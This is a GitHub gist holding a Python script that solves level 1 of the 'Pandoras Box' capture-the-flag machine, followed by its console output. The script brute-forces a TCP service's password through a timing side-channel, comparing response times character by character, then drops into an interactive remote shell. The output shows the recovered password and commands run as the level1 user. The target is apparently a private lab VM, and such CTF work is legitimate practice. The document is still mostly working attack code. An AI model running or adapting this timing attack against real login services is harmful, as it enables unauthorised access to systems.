Skip to content

Instantly share code, notes, and snippets.

@leonjza
Last active August 29, 2015 14:13
Show Gist options
  • Save leonjza/4f629c26ddb37ff471f9 to your computer and use it in GitHub Desktop.
Save leonjza/4f629c26ddb37ff471f9 to your computer and use it in GitHub Desktop.
pandora_l1.py
#!/usr/bin/python
# Pandoras Box
# Level 1
import time
import socket
import string
import sys
def find_next_char(sock, current_string):
""" Take a current string, and perform a timing attack
on the Pandoras Box Level one (tcp/54311 service)
"""
# prepare the string of characters
# that we will be looping over
input_seq = string.lowercase
input_seq += string.uppercase
input_seq += string.digits
# set some default values for next
# few socket requests
fastest_time = sys.maxint
fastest_char = None
# start a loop over the characters
# in input_seq
for character_seq in input_seq:
# add the character to the current string
character = current_string + character_seq
# each character will have their response
# time averaged. This average will become
# the one we use
character_time = 0
for i in range(5):
start_time = time.time()
sock.send(character)
result = sock.recv(50)
elapsed_time = time.time() - start_time
# add the time elapsed for use in the
# average calculation
character_time += elapsed_time
# with 5 samples, we % by 5. That will be
# the time sample
character_time = character_time/5
#print 'Character %s has time of %s' % (character, character_time)
# if the time for the character is less than
# the current known fastest one, we will
# use that
if character_time < fastest_time:
fastest_time = character_time
fastest_char = character_seq
# after all of the characters, add the fastest
# to the current string
#print 'The fastest character was %s responding in %s' % (fastest_char, fastest_time)
# return the character
return fastest_char
def do_login(sock, password):
""" Accept a socket and password and check the response
when providing the password
"""
print 'Attempting login with: %s (%s)' % (password, len(password))
# send the password
sock.send(password)
response = sock.recv(250)
# and check the response. The string 'Invalid' is
# present if the password is not correct
if 'Invalid' not in response:
print 'Login success with password: %s' % password
return True
return False
def do_shell(sock):
""" Start interaction with a socket, accepting commands
from the user.
"""
try :
while 1:
# read what we have on the socket
current = sock.recv(2048)
print current
# wait for a new command
cmd = raw_input("(py-shell) $ ");
sock.send(cmd + "\n");
result = sock.recv(2048).strip();
if not len(result) :
print "[+] Empty response. Dead shell / exited?"
sock.close();
break;
print(result);
except KeyboardInterrupt:
print "\n[+] ^C Received, closing connection"
sock.close();
except EOFError:
print "\n[+] ^D Received, closing connection"
sock.close();
if __name__ == '__main__':
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect(('192.168.217.129', 54311))
# grab the banner and welcome
banner = sock.recv(250)
welcome = sock.recv(250)
password = ''
while True:
password = password + find_next_char(sock, password)
# if we can login, start interaction with the shell
if do_login(sock, password):
do_shell(sock)
break
root@007:~/pb0x# python pandora.py
Attempting login with: R (1)
Attempting login with: R3 (2)
Attempting login with: R3s (3)
Attempting login with: R3sp (4)
Attempting login with: R3sp3 (5)
Attempting login with: R3sp3c (6)
Attempting login with: R3sp3ct (7)
Attempting login with: R3sp3ctY (8)
Attempting login with: R3sp3ctY0 (9)
Attempting login with: R3sp3ctY04 (10)
Attempting login with: R3sp3ctY04r (11)
Attempting login with: R3sp3ctY04r4 (12)
Attempting login with: R3sp3ctY04r4d (13)
Attempting login with: R3sp3ctY04r4dm (14)
Attempting login with: R3sp3ctY04r4dm1 (15)
Attempting login with: R3sp3ctY04r4dm1n (16)
Attempting login with: R3sp3ctY04r4dm1ni (17)
Attempting login with: R3sp3ctY04r4dm1niS (18)
Attempting login with: R3sp3ctY04r4dm1niSt (19)
Attempting login with: R3sp3ctY04r4dm1niSt4 (20)
Attempting login with: R3sp3ctY04r4dm1niSt4t (21)
Attempting login with: R3sp3ctY04r4dm1niSt4t0 (22)
Attempting login with: R3sp3ctY04r4dm1niSt4t0r (23)
Attempting login with: R3sp3ctY04r4dm1niSt4t0rL (24)
Attempting login with: R3sp3ctY04r4dm1niSt4t0rL1 (25)
Attempting login with: R3sp3ctY04r4dm1niSt4t0rL1k (26)
Attempting login with: R3sp3ctY04r4dm1niSt4t0rL1ke (27)
Attempting login with: R3sp3ctY04r4dm1niSt4t0rL1keY (28)
Attempting login with: R3sp3ctY04r4dm1niSt4t0rL1keYo (29)
Attempting login with: R3sp3ctY04r4dm1niSt4t0rL1keYo4 (30)
Attempting login with: R3sp3ctY04r4dm1niSt4t0rL1keYo4R (31)
Attempting login with: R3sp3ctY04r4dm1niSt4t0rL1keYo4R3 (32)
Attempting login with: R3sp3ctY04r4dm1niSt4t0rL1keYo4R3s (33)
Attempting login with: R3sp3ctY04r4dm1niSt4t0rL1keYo4R3sp (34)
Attempting login with: R3sp3ctY04r4dm1niSt4t0rL1keYo4R3spe (35)
Attempting login with: R3sp3ctY04r4dm1niSt4t0rL1keYo4R3spec (36)
Attempting login with: R3sp3ctY04r4dm1niSt4t0rL1keYo4R3spect (37)
Attempting login with: R3sp3ctY04r4dm1niSt4t0rL1keYo4R3spectY (38)
Attempting login with: R3sp3ctY04r4dm1niSt4t0rL1keYo4R3spectY0 (39)
Attempting login with: R3sp3ctY04r4dm1niSt4t0rL1keYo4R3spectY04 (40)
Attempting login with: R3sp3ctY04r4dm1niSt4t0rL1keYo4R3spectY04r (41)
Attempting login with: R3sp3ctY04r4dm1niSt4t0rL1keYo4R3spectY04rG (42)
Attempting login with: R3sp3ctY04r4dm1niSt4t0rL1keYo4R3spectY04rG0 (43)
Attempting login with: R3sp3ctY04r4dm1niSt4t0rL1keYo4R3spectY04rG0q (44)
Login success with password: R3sp3ctY04r4dm1niSt4t0rL1keYo4R3spectY04rG0q
Shell$
(py-shell) $ ls
level2
level2_readme.txt
Shell$
(py-shell) $ id
uid=1001(level1) gid=1001(level1) groups=1001(level1)
Shell$
(py-shell) $
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment